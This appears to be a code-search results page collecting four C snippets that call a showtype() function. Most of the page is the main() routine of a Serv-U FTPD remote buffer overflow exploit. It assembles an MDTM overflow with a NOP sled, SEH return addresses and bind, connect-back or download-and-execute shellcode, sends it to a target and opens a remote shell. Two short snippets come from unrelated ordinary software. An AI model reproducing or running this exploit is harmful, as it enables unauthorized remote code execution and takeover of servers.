コード例 #1
0
ファイル: malloc.c プロジェクト: SylvestreG/bitrig 
void
print_types(void)
{
	int n, count = 0;

	for (n = dispstart; n < num_disp; n++) {
		showtype(n);
		count++;
		if (maxprint > 0 && count >= maxprint)
			break;	}
}
コード例 #2
0
ファイル: 28235.c プロジェクト: 0x24bin/exploit-database 
//--------------------------------------------------------------------------------
//  打印帮助信息
//--------------------------------------------------------------------------------
void usage(char *p)
{
   printf( "[Usage:]\n"
           "    %s [Options] <ExeFile>\n\n"
           "[Options:]\n"
           "    /a <LHZFile>   Append LHZ(lha)File\n"
           "    /o <OutFile>   Output file name, default is %s\n"
           "    /t <OSType>    Target Type, default is 0\n\n",
           p, OutFile);

   showtype();
}
コード例 #3
0
ファイル: gram.c プロジェクト: joequant/iraf 
/* LISTHELP -- List all the (visible) ltasks in the given package in the form
 * of a sorted table.  Used to give menus in response to ? and ?? directives.
 */
void 
listhelp (struct package *pkp, int show_invis)
{
	static	int first_col=7, maxch=20, ncol=0;
	register struct ltask *ltp;
	register char	*ip, *op;

	char	buf[4096], *list[MAXMENU];
	int	nltask, last_col;
	FILE	*fp;

	nltask = 0;
	last_col = c_envgeti ("ttyncols") - 1;

	fp = currentask->t_stdout;
	op = buf;

	for (ltp = pkp->pk_ltp;  ltp != NULL;  ltp = ltp->lt_nlt) {
	    if (ltp->lt_flags & LT_INVIS && show_invis == NO)
		continue;
	    if (nltask >= MAXMENU)
		cl_error (E_UERR, "too many ltasks in menu");

	    /* Get task name. */
	    list[nltask++] = op;
	    for (ip=ltp->lt_lname;  (*op = *ip++);  op++)
		;

	    /* If special task, add character defining task type. */
	    if (showtype()) {
		if (ltp->lt_flags & LT_DEFPCK)
		    *op++ = '.';
		else if (ltp->lt_flags & LT_PSET)
		    *op++ = '@';
	    }

	    *op++ = EOS;
	}

	/* Sort the list and output the table. */
	if (nltask) {
	    strsort (list, nltask);
	    strtable (fp, list, nltask, first_col, last_col, maxch, ncol);
	}
}
コード例 #4
0
int main(int argc, char **argv)
{
	struct	sockaddr_in sa, server, client;
#ifndef UNIX
	WSADATA	wsd;
#endif
	SOCKET	s, s2, s3;
	int	iErr, ret, len;
	char	szRecvBuff[MAX_LEN];
	int	i,j;
	int	iType =DEFTYPE, iPort=FTPPORT;
	char	*ip=NULL, *pUser=DEFUSER, *pPass=DEFPASS, *cbHost=NULL, *url;
	char	user[128], pass[128];
	BOOL	bCb=FALSE,bUrl=FALSE, bLocal=TRUE, b2x=FALSE;
	unsigned short	shport=SHELLPORT, shport2=0;
	unsigned long	cbip;
	unsigned int	timeout=5000, Reuse;
	char	penetrate[255],cbHost2[20];
	
	printf( "Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V%s (2004-01-07)\r\n"
		"Bug find by bkbll ([email protected]), Code by lion ([email protected])\r\n"
		"Welcome to HUC website http://www.cnhonker.com\r\n\n"
		 	, VERSION);

	if(argc < 2)
	{
		usage(argv[0]);
		return 1;
	}
	else if(argc == 2 && argv[1][1] == 't')
	{
		showtype();
		return 1;
	}

	for(i=1;i<argc;i+=2)
	{
		if(strlen(argv[i]) != 2)
		{
			usage(argv[0]);
			return -1;
		}
		// check parameter
		if(i == argc-1)
		{
			usage(argv[0]);
			return -1;
		}
		switch(argv[i][1])
		{
			case 'i':
				ip=argv[i+1];
				break;
			case 't':
				iType = atoi(argv[i+1]);
				break;
			case 'f':
				iPort=atoi(argv[i+1]);
				break;
			case 'p':
				pPass = argv[i+1];
				break;
			case 'u':
				pUser=argv[i+1];
				break;
			case 's':
				shport=atoi(argv[i+1]);
				break;
			case 'c':
				cbHost=argv[i+1];
				bCb=TRUE;
				break;
			case 'd':
				url = argv[i+1];
				bUrl=TRUE;
				break;
				
		}
	}

	if((!ip) || (!user) || (!pass))
	{
		usage(argv[0]);
		printf("[-] Invalid parameter.\n");
		return -1;
	}

	if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
	{
		usage(argv[0]);
		printf("[-] Invalid type.\n");
		return -1;
	}

	if(iPort <1 || iPort >65535 || shport <1 || shport > 65535)
	{
		usage(argv[0]);
		printf("[-] Invalid port.\n");
		return -1;
	}

	if(bUrl)
	{
		if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 255)
		{
			usage(argv[0]);
			printf("[-] Invalid url. Must start with 'http://','ftp://' and <255 bytes.\n");
			return -1;				
		}
	}
	
	if(strstr(targets[iType].szDescription, "2.x"))
	{
		b2x = TRUE;
		printf("[*] Attack Target is Serv-U 2.x.\r\n");
	}
	else
	{
		printf("[*] Attack Target is Serv-U 3.x/4.x/5.x.\r\n");
	}
	
	_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
	user[sizeof(user)-1]='\0';
	_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
	pass[sizeof(pass)-1]='\0';
	szSend[0] = user;	//user
	szSend[1] = pass;	//pass	
	szSend[2] = penetrate;	//pentrate
	szSend[3] = szCommand;	//shellcode
	
	// Penetrate through the firewall.
	if(bCb && shport > 1024)
	{
		strncpy(cbHost2, cbHost, 20);
		for(i=0;i<strlen(cbHost); i++)
		{
			if(cbHost[i] == '.')
				cbHost2[i] = ',';
		}
		
		sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);

		//printf("%s", penetrate);
	}
	else
	{
		sprintf(penetrate,"TYPE I\r\n");		
	}

	// fill the "MDTM" command
	strcpy(szCommand, "MDTM 20031111111111+");

	// fill the egg
	for(i=0; i<SEH_OFFSET; i++)
	{
		strcat(szCommand, "\x90");
	}

	// ret addr
	if(b2x)
	{

		// fill the egg
		if(strstr(targets[iType].szDescription, "<"))
		{
			j = 8;
		}
		else
		{
			j = 4;
		}
		for(i=0; i<j; i++)
		{
			strcat(szCommand, "\x90");
		}
		
		memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
		
		memcpy(&szCommand[READ_OFFSET], &READ_ADDR, 4);
		
		// fill the decode
		strcat(szCommand, decode);
	}
	else
	{
		
		// fill the seh
		for(i=0; i<0x10*1; i+=8)
		//for(i=0; i<1; i++)
		{
			memcpy(&szCommand[strlen(szCommand)], &JMP_OVER, 4);
			memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
		}
	
		// fill the decode
		strcat(szCommand, decode2);	
	}

	// fill the space
	strcat(szCommand, " ");

	// fill the egg
	for(i=0; i<0x10; i++)
	{
		strcat(szCommand, "\x90");
	}

	// fill the shellcode start sign
	strcat(szCommand, sc_start);

	// fill the shellcode
        if(bCb)
	{
		// connectback shellcode
		shport2 = htons(shport)^(u_short)0x9999;
		cbip = inet_addr(cbHost)^0x99999999;
		memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
		memcpy(&cbsc[IP_OFFSET], &cbip, 4);
		strcat(szCommand, cbsc);		
	}
	else
	if(bUrl)
	{
		memset(downloadurl, 0, sizeof(downloadurl));

		// download url exec shellcode
		for(i=0;i<strlen(url);i++)
		{
			downloadurl[i] = url[i] ^ 0x99;
		}
		
		downloadurl[i] ^= 0x99;
		strcat(szCommand, dusc);
		strcat(szCommand, downloadurl);		
	} 
        else 
	{
		// rebind shellcode
		shport2 = htons(shport)^(u_short)0x9999;
		memcpy(&sc[BIND_OFFSET], &shport2, 2);
		strcat(szCommand, sc);
	}

	// fill the shellcode end sign
	strcat(szCommand, sc_end);

	// send end
	strcat(szCommand, "\r\n");

	if(strlen(szCommand) >= sizeof(szCommand))
	{
		printf("[-] stack buffer overflow.\n");
		return -1;
	}
	
	//printf("send size %d:%s", strlen(szCommand), szCommand);
	//printf("buffsize %d\r\n", strlen(szCommand)-5-2);
	
#ifndef UNIX
	__try
#endif
	{

#ifndef UNIX
		if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
		{
			printf("[-] WSAStartup error:%d\n", WSAGetLastError());
			__leave;
		}
#endif
		s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
		if(s == INVALID_SOCKET)
		{
			printf("[-] Create socket failed:%d",GetLastError());
			__leave;
		}

		sa.sin_family=AF_INET;
		sa.sin_port=htons((USHORT)iPort);

#ifndef UNIX
		sa.sin_addr.S_un.S_addr=inet_addr(ip);
#else
		sa.sin_addr.s_addr=inet_addr(ip);
#endif
		setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
		iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
		if(iErr == SOCKET_ERROR)
		{
			printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
			__leave;
		}
		printf("[+] Connect to %s:%d success.\n", ip, iPort);
		
		if(bCb)
		{
			Sleep(500);
			s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

			server.sin_family=AF_INET;

#ifndef UNIX
			server.sin_addr.S_un.S_addr=inet_addr(cbHost);
			//server.sin_addr.s_addr=INADDR_ANY; 
#else
			server.sin_addr.s_addr=inet_addr(cbHost);
#endif			
			
			server.sin_port=htons((unsigned short)shport);

			setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));

			Reuse = 1; 
			setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));

			if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
			{
				printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
				printf("[-] You must run nc get the shell.\n");
				bLocal = FALSE;
				//closesocket(s2);
				//__leave;
			}
			else
			{	
				printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
				listen(s2, 1); 
			}
		}
		
		for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
		{
			memset(szRecvBuff, 0, sizeof(szRecvBuff));
			iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
			if(iErr == SOCKET_ERROR)
			{
				printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
				__leave;
			}
			printf("[+] Recv: %s", szRecvBuff);
			
			if(szRecvBuff[0] == '5')
			{
				printf("[-] Server return a error Message.\r\n");
				__leave;
			}

			iErr = send(s, szSend[i], strlen(szSend[i]),0);
			if(iErr == SOCKET_ERROR)
			{
				printf("[-] Send buffer error:%d.\n", WSAGetLastError());
				__leave;
			}

			if(i==sizeof(szSend)/sizeof(szSend[0])-1)
				printf("[+] Send shellcode %d bytes.\n", iErr);
			else
				printf("[+] Send: %s", szSend[i]);
		}

		if(bUrl)
		{
			printf("[+] Target Download the file and exec: %s\r\n", url);
			printf("[+] Success? Maybe!\r\n");
		}
		else
		{
			printf("[+] If you don't have a shell it didn't work.\n");
 
			if(bCb)
			{
				if(bLocal)
				{
					printf("[+] Wait for shell...\n");
			
					len = sizeof(client);
					s3 = accept(s2, (struct sockaddr*)&client, &len); 
					if(s3 != INVALID_SOCKET) 
					{ 
						printf("[+] Exploit success! Good luck! :)\n");
						printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
						shell(s3);
					}
				}	
			}
			else 
			{
				printf("[+] Connect to shell...\n");
			
				Sleep(1000);
				s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
				server.sin_family = AF_INET;
				server.sin_port = htons(shport);
				server.sin_addr.s_addr=inet_addr(ip);

				ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
				if(ret!=0)
				{
					printf("[-] Exploit seem failed.\n");
					__leave;
				}
			
				printf("[+] Exploit success! Good luck! :)\n");
				printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
				shell(s2);
			}
		}	
	}

#ifdef UNIX
exit_try:
#endif

#ifndef UNIX
 	__finally
#endif
	{
		if(s != INVALID_SOCKET) closesocket(s);
		if(s2 != INVALID_SOCKET) closesocket(s2);
		if(s3 != INVALID_SOCKET) closesocket(s3);
		
#ifndef UNIX
		WSACleanup();
#endif
	}

	return 0;
}